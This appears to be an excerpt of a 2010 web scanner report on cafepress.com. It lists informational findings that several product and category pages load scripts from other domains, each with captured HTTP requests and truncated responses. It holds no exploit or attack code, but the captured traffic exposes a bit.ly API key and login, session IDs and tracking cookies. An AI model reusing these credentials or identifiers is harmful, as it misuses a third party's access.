cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 75158
Date: Sun, 26 Dec 2010 13:44:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.2. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content9.cpcache.com/js/http_request.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

5.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/js/http_request.js
http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

5.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content8.cpcache.com/js/http_request.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 93172
Date: Sun, 26 Dec 2010 13:44:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://content8.cpcache.com/js/http_request.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script src="http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"></script>
...[SNIP]...

5.5. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content5.cpcache.com/js/http_request.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

5.6. http://www.cafepress.com/+aprons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+aprons

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content6.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 60330
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content6.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.7. http://www.cafepress.com/+baby-blanket previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-blanket

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 58677
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.8. http://www.cafepress.com/+baby-bodysuits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-bodysuits

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59167
Date: Sun, 26 Dec 2010 13:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.9. http://www.cafepress.com/+baby-hat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-hat

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58517
Date: Sun, 26 Dec 2010 13:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.10. http://www.cafepress.com/+bags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+bags

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
